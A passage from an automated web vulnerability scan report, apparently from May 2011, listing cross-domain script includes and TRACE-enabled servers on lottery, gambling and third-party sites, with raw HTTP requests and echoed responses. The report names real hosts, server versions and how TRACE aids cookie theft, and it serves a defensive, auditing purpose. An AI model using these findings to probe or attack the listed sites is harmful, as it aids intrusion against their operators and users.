https://ble.hs.llnwd.net/e1/ne/NorgesLoddet/no/df_WLJavascriptLib_v25668.js
https://ble.hs.llnwd.net/e1/ne/NorgesLoddet/no/df_jQueryJavaScriptLib_v8594.js

Request

GET /no/play/GonzosQuest HTTP/1.1
Host: www.norskelodd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lggdnstt=0;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:01:47 GMT
Connection: close
Content-Length: 100369
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<!-
...[SNIP]...

<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/ne/NorgesLoddet/no/df_CoreRootJavascriptLib_v8160.js"></script>
...[SNIP]...

<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/ne/NorgesLoddet/no/df_jQueryJavaScriptLib_v8594.js"></script>
...[SNIP]...

<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/ne/NorgesLoddet/no/df_WLJavascriptLib_v25668.js"></script>
...[SNIP]...

<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/ne/NorgesLoddet/no/df_CoreJavascriptLib_v27275.js"></script>
...[SNIP]...

19.163. https://www.norskelodd.com/no/promotions/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.norskelodd.com
Path:	/no/promotions/

Issue detail

The response dynamically includes the following scripts from other domains:

https://ble.hs.llnwd.net/e1/ne/NorgesLoddet/no/df_CoreJavascriptLib_v27275.js
https://ble.hs.llnwd.net/e1/ne/NorgesLoddet/no/df_CoreRootJavascriptLib_v8160.js
https://ble.hs.llnwd.net/e1/ne/NorgesLoddet/no/df_WLJavascriptLib_v25668.js
https://ble.hs.llnwd.net/e1/ne/NorgesLoddet/no/df_jQueryJavaScriptLib_v8594.js

Request

GET /no/promotions/ HTTP/1.1
Host: www.norskelodd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lggdnstt=0;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:01:30 GMT
Connection: close
Content-Length: 101653
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<!-
...[SNIP]...

<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/ne/NorgesLoddet/no/df_CoreRootJavascriptLib_v8160.js"></script>
...[SNIP]...

<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/ne/NorgesLoddet/no/df_jQueryJavaScriptLib_v8594.js"></script>
...[SNIP]...

<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/ne/NorgesLoddet/no/df_WLJavascriptLib_v25668.js"></script>
...[SNIP]...

<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/ne/NorgesLoddet/no/df_CoreJavascriptLib_v27275.js"></script>
...[SNIP]...

19.164. http://www.ok.co.uk/home/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ok.co.uk
Path:	/home/

Issue detail

The response dynamically includes the following scripts from other domains:

http://cloud.topfox.co.uk/a/site/43/htmlTopPrizes.1288882172617.js
http://loadeu.exelator.com/load/?p=261&g=003&c=23706&ctg=Home
http://p.ctasnet.com/partners/universal/in?pid=147
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US
http://widgets.twimg.com/j/2/widget.js
http://www.google-analytics.com/urchin.js
http://www.google.co.uk/coop/cse/brand?form=cse-search-box&lang=en
http://www.google.co.uk/coop/cse/brand?form=cse-search-box-foot&lang=en
http://www.sublimemedia.net/sublimemedia/sublimemedia.aspx?referId=10842
http://www.sublimemedia.net/sublimemedia/sublimemedia.aspx?referId=10843

Request

GET /home/ HTTP/1.1
Host: www.ok.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:37:25 GMT
Server: Apache
MS-Author-Via: DAV
Connection: close
Content-Type: text/html
Content-Length: 64992

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.sublimemedia.net/sublimemedia/sublimemedia.aspx?referId=10843"></script>
...[SNIP]...
<input type="submit" class="submit" value="" />
<script type="text/javascript" src="http://www.google.co.uk/coop/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...
<div class="boxBody">
<script type="text/javascript" src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://cloud.topfox.co.uk/a/site/43/htmlTopPrizes.1288882172617.js"></script>
...[SNIP]...
<div class="boxBody">
<script src="http://widgets.twimg.com/j/2/widget.js" type="text/javascript"></script>
...[SNIP]...
<input type="submit" class="submit" value="" />
<script type="text/javascript" src="http://www.google.co.uk/coop/cse/brand?form=cse-search-box-foot&lang=en"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://loadeu.exelator.com/load/?p=261&g=003&c=23706&ctg=Home"></script>
...[SNIP]...
</script>
<script language="JavaScript" type="text/javascript" src="http://p.ctasnet.com/partners/universal/in?pid=147"></script>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://www.sublimemedia.net/sublimemedia/sublimemedia.aspx?referId=10842" type="text/javascript"></script>
...[SNIP]...

19.165. http://www.okscratchcards.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.okscratchcards.com
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://s0.2mdn.net/879366/flashwrite_1_2.js

Request

GET / HTTP/1.1
Host: www.okscratchcards.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 12080
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Date: Mon, 16 May 2011 11:37:09 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Con
...[SNIP]...
</script>
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js" type="text/javascript"></script>
...[SNIP]...

19.166. http://www.opensource.org/licenses/mit-license.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.opensource.org
Path:	/licenses/mit-license.php

Issue detail

The response dynamically includes the following script from another domain:

http://www.google-analytics.com/urchin.js

Request

GET /licenses/mit-license.php HTTP/1.1
Host: www.opensource.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

19.167. http://www.primegrattage.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.primegrattage.com
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://nxtck.com/act.php?zid=16677

Request

GET / HTTP/1.1
Host: www.primegrattage.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:00:34 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON DSP COR CUR OUR PUB NOR UNI CNT"
X-Powered-By: ASP.NET
Content-Length: 27400
Content-Type: text/html
Set-Cookie: pscref=; expires=Thu, 10-May-2012 12:00:34 GMT; domain=.primegrattage.com; path=/
Set-Cookie: MTH=1072%2D100%2Dfr; expires=Wed, 15-Jun-2011 12:00:34 GMT; domain=.primegrattage.com; path=/
Set-Cookie: plstat=0; expires=Tue, 15-May-2012 12:00:34 GMT; domain=.primegrattage.com; path=/
Set-Cookie: ARC=130138; expires=Tue, 15-May-2012 12:00:34 GMT; domain=.primegrattage.com; path=/
Set-Cookie: ASPSESSIONIDCSTQTATQ=NDANCHNDBOKGLAFOAPEGFKFJ; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...

<script src="http://nxtck.com/act.php?zid=16677"></script>
...[SNIP]...

19.168. http://www.vincite.net/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.vincite.net
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://winnings.com/wp-content/plugins/google-analyticator/external-tracking.min.js?ver=6.1.1
http://winnings.com/wp-includes/js/jquery/jquery.js?ver=1.4.2
http://www.cdnfo.com/scripts/js.js
http://www.cdnfo.com/scripts/swfobject1-5.js

Request

GET /?vid=540129 HTTP/1.1
Host: www.vincite.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

19.169. http://www.winnings.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.winnings.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://www.cdnfo.com/scripts/js.js
http://www.cdnfo.com/scripts/swfobject1-5.js

Request

Response

19.170. http://www.winnings.com/how-to-win-money previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.winnings.com
Path:	/how-to-win-money

Issue detail

The response dynamically includes the following scripts from other domains:

http://www.cdnfo.com/scripts/js.js
http://www.cdnfo.com/scripts/swfobject1-5.js

Request

Response

19.171. http://www.winnings.com/instant-games previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.winnings.com
Path:	/instant-games

Issue detail

The response dynamically includes the following scripts from other domains:

http://www.cdnfo.com/scripts/js.js
http://www.cdnfo.com/scripts/swfobject1-5.js

Request

Response

19.172. http://www.winnings.com/lottery-scratch-cards previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.winnings.com
Path:	/lottery-scratch-cards

Issue detail

The response dynamically includes the following scripts from other domains:

http://www.cdnfo.com/scripts/js.js
http://www.cdnfo.com/scripts/swfobject1-5.js

Request

Response

19.173. http://www.winnings.com/scratch-cards previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.winnings.com
Path:	/scratch-cards

Issue detail

The response dynamically includes the following scripts from other domains:

http://www.cdnfo.com/scripts/js.js
http://www.cdnfo.com/scripts/swfobject1-5.js

Request

Response

19.174. http://www.winnings.com/site-map previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.winnings.com
Path:	/site-map

Issue detail

The response dynamically includes the following scripts from other domains:

http://www.cdnfo.com/scripts/js.js
http://www.cdnfo.com/scripts/swfobject1-5.js

Request

GET /site-map HTTP/1.1
Host: www.winnings.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: qtrans_cookie_test=qTranslate+Cookie+Test; WinningsSID=mae3p27b7retpgqtu508ctoij2; winnings[vid]=540129; winnings[subdomain]=www; winnings[sessionId]=103122733; winnings[cc]=US;

Response

19.175. http://www.winnings.com/slots previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.winnings.com
Path:	/slots

Issue detail

The response dynamically includes the following scripts from other domains:

http://www.cdnfo.com/scripts/js.js
http://www.cdnfo.com/scripts/swfobject1-5.js

Request

Response

19.176. http://www.youtube.com/user/CrazyScratchCom previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.youtube.com
Path:	/user/CrazyScratchCom

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_companion_ad.js
http://s.ytimg.com/yt/js/channel_legacy_all-vflMAM4jp.js
http://s.ytimg.com/yt/jsbin/www-channel-vfl94KsmN.js
http://s.ytimg.com/yt/jsbin/www-core-vfl80tF0w.js
http://www.google.com/jsapi?autoload=%7B%22modules%22%3A%5B%7B%22name%22%3A%22ads%22%2C%22version%22%3A%221%22%2C%22callback%22%3A%22(function()%7B%7D)%22%2C%22packages%22%3A%5B%22content%22%5D%7D%5D%7D
http://www.googletagservices.com/tag/static/google_services.js

Request

GET /user/CrazyScratchCom HTTP/1.1
Host: www.youtube.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 11:58:44 GMT
Server: Apache
X-Content-Type-Options: nosniff
Set-Cookie: use_hitbox=72c46ff6cbcdb7c5585c36411b6b334edAEAAAAw; path=/; domain=.youtube.com
Set-Cookie: VISITOR_INFO1_LIVE=QJdmZX3XHX0; path=/; domain=.youtube.com; expires=Wed, 11-Jan-2012 11:58:44 GMT
Set-Cookie: GEO=dfb55d2f94c5feeb036cbf6d295ddc27cwsAAAAzVVOtwdbzTdERdA==; path=/; domain=.youtube.com
Expires: Tue, 27 Apr 1971 19:44:06 EST
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Connection: close

<!DOCTYPE html>
<html lang="en" dir="ltr" xmlns:og="http://opengraphprotocol.org/schema/">

<head>

...[SNIP]...
</script>

<script id="www-core-js" src="//s.ytimg.com/yt/jsbin/www-core-vfl80tF0w.js"></script>
...[SNIP]...
</script>

<script src="//s.ytimg.com/yt/jsbin/www-channel-vfl94KsmN.js"></script>

<script src="//s.ytimg.com/yt/js/channel_legacy_all-vflMAM4jp.js"></script>

<script type="text/javascript" src="http://www.google.com/jsapi?autoload=%7B%22modules%22%3A%5B%7B%22name%22%3A%22ads%22%2C%22version%22%3A%221%22%2C%22callback%22%3A%22(function()%7B%7D)%22%2C%22packages%22%3A%5B%22content%22%5D%7D%5D%7D"></script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_companion_ad.js"></script>
...[SNIP]...
</div>

<script src="http://www.googletagservices.com/tag/static/google_services.js"></script>
...[SNIP]...

19.177. http://www.youtube.com/user/PostcodeLottery previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.youtube.com
Path:	/user/PostcodeLottery

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_companion_ad.js
http://s.ytimg.com/yt/js/channel_legacy_all-vflMAM4jp.js
http://s.ytimg.com/yt/jsbin/www-channel-vfl94KsmN.js
http://s.ytimg.com/yt/jsbin/www-core-vfl80tF0w.js
http://www.google.com/jsapi?autoload=%7B%22modules%22%3A%5B%7B%22name%22%3A%22ads%22%2C%22version%22%3A%221%22%2C%22callback%22%3A%22(function()%7B%7D)%22%2C%22packages%22%3A%5B%22content%22%5D%7D%5D%7D
http://www.googletagservices.com/tag/static/google_services.js

Request

GET /user/PostcodeLottery HTTP/1.1
Host: www.youtube.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 11:58:44 GMT
Server: Apache
X-Content-Type-Options: nosniff
Set-Cookie: use_hitbox=72c46ff6cbcdb7c5585c36411b6b334edAEAAAAw; path=/; domain=.youtube.com
Set-Cookie: VISITOR_INFO1_LIVE=QPD6waz_a-Y; path=/; domain=.youtube.com; expires=Wed, 11-Jan-2012 11:58:44 GMT
Set-Cookie: GEO=dfb55d2f94c5feeb036cbf6d295ddc27cwsAAAAzVVOtwdbzTdERdA==; path=/; domain=.youtube.com
Expires: Tue, 27 Apr 1971 19:44:06 EST
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Connection: close

<!DOCTYPE html>
<html lang="en" dir="ltr" xmlns:og="http://opengraphprotocol.org/schema/">

<head>

...[SNIP]...
</script>

<script id="www-core-js" src="//s.ytimg.com/yt/jsbin/www-core-vfl80tF0w.js"></script>
...[SNIP]...
</script>

<script src="//s.ytimg.com/yt/jsbin/www-channel-vfl94KsmN.js"></script>

<script src="//s.ytimg.com/yt/js/channel_legacy_all-vflMAM4jp.js"></script>

<script type="text/javascript" src="http://www.google.com/jsapi?autoload=%7B%22modules%22%3A%5B%7B%22name%22%3A%22ads%22%2C%22version%22%3A%221%22%2C%22callback%22%3A%22(function()%7B%7D)%22%2C%22packages%22%3A%5B%22content%22%5D%7D%5D%7D"></script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_companion_ad.js"></script>
...[SNIP]...
</div>

<script src="http://www.googletagservices.com/tag/static/google_services.js"></script>
...[SNIP]...

19.178. http://www.youtube.com/user/primescratchcards1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.youtube.com
Path:	/user/primescratchcards1

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_companion_ad.js
http://s.ytimg.com/yt/js/channel_legacy_all-vflMAM4jp.js
http://s.ytimg.com/yt/jsbin/www-channel-vfl94KsmN.js
http://s.ytimg.com/yt/jsbin/www-core-vfl80tF0w.js
http://www.google.com/jsapi?autoload=%7B%22modules%22%3A%5B%7B%22name%22%3A%22ads%22%2C%22version%22%3A%221%22%2C%22callback%22%3A%22(function()%7B%7D)%22%2C%22packages%22%3A%5B%22content%22%5D%7D%5D%7D
http://www.googletagservices.com/tag/static/google_services.js

Request

GET /user/primescratchcards1 HTTP/1.1
Host: www.youtube.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 11:58:46 GMT
Server: Apache
X-Content-Type-Options: nosniff
Set-Cookie: use_hitbox=72c46ff6cbcdb7c5585c36411b6b334edAEAAAAw; path=/; domain=.youtube.com
Set-Cookie: VISITOR_INFO1_LIVE=o7D5C2X2FIw; path=/; domain=.youtube.com; expires=Wed, 11-Jan-2012 11:58:46 GMT
Set-Cookie: GEO=8d3458027bf69c9d59b40211c24404e3cwsAAAAzVVOtwdbzTdERdg==; path=/; domain=.youtube.com
Expires: Tue, 27 Apr 1971 19:44:06 EST
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Connection: close

<!DOCTYPE html>
<html lang="en" dir="ltr" xmlns:og="http://opengraphprotocol.org/schema/">

<head>

...[SNIP]...
</script>

<script id="www-core-js" src="//s.ytimg.com/yt/jsbin/www-core-vfl80tF0w.js"></script>
...[SNIP]...
</script>

<script src="//s.ytimg.com/yt/jsbin/www-channel-vfl94KsmN.js"></script>

<script src="//s.ytimg.com/yt/js/channel_legacy_all-vflMAM4jp.js"></script>

<script type="text/javascript" src="http://www.google.com/jsapi?autoload=%7B%22modules%22%3A%5B%7B%22name%22%3A%22ads%22%2C%22version%22%3A%221%22%2C%22callback%22%3A%22(function()%7B%7D)%22%2C%22packages%22%3A%5B%22content%22%5D%7D%5D%7D"></script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_companion_ad.js"></script>
...[SNIP]...
</div>

<script src="http://www.googletagservices.com/tag/static/google_services.js"></script>
...[SNIP]...

20. TRACE method is enabled previous next
There are 21 instances of this issue:

http://d.tradex.openx.com/
http://d.xp1.ru4.com/
http://gmpg.org/
http://jquery.com/
http://jquery.org/
http://m.xp1.ru4.com/
http://optimized-by.rubiconproject.com/
https://sealinfo.verisign.com/
http://secure-us.imrworldwide.com/
http://sizzlejs.com/
http://winter.metacafe.com/
http://www.egba.eu/
http://www.gambleaware.co.uk/
http://www.gamcare.org.uk/
http://www.gx4.com/
http://www.nedstat.com/
http://www.opensource.org/
http://www.postcodelottery.com/
https://www.postcodelottery.com/
http://www.quirksmode.org/
http://www.tstglobal.com/

Issue description

The TRACE method is designed for diagnostic purposes. If enabled, the web server will respond to requests which use the TRACE method by echoing in its response the exact request which was received.

Although this behaviour is apparently harmless in itself, it can sometimes be leveraged to support attacks against other application users. If an attacker can find a way of causing a user to make a TRACE request, and can retrieve the response to that request, then the attacker will be able to capture any sensitive data which is included in the request by the user's browser, for example session cookies or credentials for platform-level authentication. This may exacerbate the impact of other vulnerabilities, such as cross-site scripting.

Issue remediation

The TRACE method should be disabled on the web server.

20.1. http://d.tradex.openx.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d.tradex.openx.com
Path:	/

Request

TRACE / HTTP/1.0
Host: d.tradex.openx.com
Cookie: 41ea3e0cb3d84673

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:52:09 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: d.tradex.openx.com
Cookie: 41ea3e0cb3d84673
X-Forwarded-For: 173.193.214.243

20.2. http://d.xp1.ru4.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d.xp1.ru4.com
Path:	/

Request

TRACE / HTTP/1.0
Host: d.xp1.ru4.com
Cookie: 4fb7a64d5b1a4620

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Mon, 16 May 2011 12:52:13 GMT
P3p: policyref="/w3c/p3p.xml", CP="NON DSP COR PSAa OUR STP UNI"
Content-type: message/http
Connection: close

TRACE / HTTP/1.0
Host: d.xp1.ru4.com
Cookie: 4fb7a64d5b1a4620

20.3. http://gmpg.org/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://gmpg.org
Path:	/

Request

TRACE / HTTP/1.0
Host: gmpg.org
Cookie: f8c2ad5d39cc13f5

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 11:46:24 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.7a mod_bwlimited/1.4
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: gmpg.org
Cookie: f8c2ad5d39cc13f5

20.4. http://jquery.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://jquery.com
Path:	/

Request

TRACE / HTTP/1.0
Host: jquery.com
Cookie: 2401d6c9d1210be1

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 11:58:48 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: jquery.com
Cookie: 2401d6c9d1210be1

20.5. http://jquery.org/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://jquery.org
Path:	/

Request

TRACE / HTTP/1.0
Host: jquery.org
Cookie: 6071a5dca55ed7d4

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:32:16 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: jquery.org
Cookie: 6071a5dca55ed7d4

20.6. http://m.xp1.ru4.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://m.xp1.ru4.com
Path:	/

Request

TRACE / HTTP/1.0
Host: m.xp1.ru4.com
Cookie: e7af286216a13948

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Mon, 16 May 2011 12:52:11 GMT
P3p: policyref="/w3c/p3p.xml", CP="NON DSP COR PSAa OUR STP UNI"
Content-type: message/http
Connection: close

TRACE / HTTP/1.0
Host: m.xp1.ru4.com
Cookie: e7af286216a13948

20.7. http://optimized-by.rubiconproject.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://optimized-by.rubiconproject.com
Path:	/

Request

TRACE / HTTP/1.0
Host: optimized-by.rubiconproject.com
Cookie: f0d936249002cee9

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 11:39:10 GMT
Server: RAS/1.3 (Unix)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Cookie: f0d936249002cee9
Host: optimized-by.rubiconproject.com
X-Forwarded-For: 173.193.214.243

20.8. https://sealinfo.verisign.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://sealinfo.verisign.com
Path:	/

Request

TRACE / HTTP/1.0
Host: sealinfo.verisign.com
Cookie: 8ab7015dd036c842

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:10:53 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: sealinfo.verisign.com
Cookie: 8ab7015dd036c842

20.9. http://secure-us.imrworldwide.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secure-us.imrworldwide.com
Path:	/

Request

TRACE / HTTP/1.0
Host: secure-us.imrworldwide.com
Cookie: e7871189ff1dc743

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:49:30 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Cookie: e7871189ff1dc743
Host: secure-us.imrworldwide.com

20.10. http://sizzlejs.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sizzlejs.com
Path:	/

Request

TRACE / HTTP/1.0
Host: sizzlejs.com
Cookie: 4aedf1bebccec63f

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:13:06 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: sizzlejs.com
Cookie: 4aedf1bebccec63f

20.11. http://winter.metacafe.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://winter.metacafe.com
Path:	/

Request

TRACE / HTTP/1.0
Host: winter.metacafe.com
Cookie: fcd839e4e85761a5

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:49:31 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: winter.metacafe.com
Cookie: fcd839e4e85761a5
Connection: Keep-Alive
X-Forwarded-For: 173.193.214.243

20.12. http://www.egba.eu/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.egba.eu
Path:	/

Request

TRACE / HTTP/1.0
Host: www.egba.eu
Cookie: b871ba3cd96d0a7b

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:31:50 GMT
Server: Apache/2.2.0 (Fedora)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.egba.eu
Cookie: b871ba3cd96d0a7b

20.13. http://www.gambleaware.co.uk/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.gambleaware.co.uk
Path:	/

Request

TRACE / HTTP/1.0
Host: www.gambleaware.co.uk
Cookie: 7f6234ae21e402af

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:35:01 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.gambleaware.co.uk
Cookie: 7f6234ae21e402af

20.14. http://www.gamcare.org.uk/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.gamcare.org.uk
Path:	/

Request

TRACE / HTTP/1.0
Host: www.gamcare.org.uk
Cookie: 1786de8ed51ce151

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:01:54 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.gamcare.org.uk
Cookie: 1786de8ed51ce151

20.15. http://www.gx4.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.gx4.com
Path:	/

Request

TRACE / HTTP/1.0
Host: www.gx4.com
Cookie: 6c42e7b711c1f33b

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:13:58 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.gx4.com
Cookie: 6c42e7b711c1f33b

20.16. http://www.nedstat.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.nedstat.com
Path:	/

Request

TRACE / HTTP/1.0
Host: www.nedstat.com
Cookie: 9e344073c266d407

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:35:26 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.nedstat.com
Cookie: 9e344073c266d407

20.17. http://www.opensource.org/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.opensource.org
Path:	/

Request

TRACE / HTTP/1.0
Host: www.opensource.org
Cookie: 87ff0c14b8055ebf

Response

HTTP/1.1 200 OK
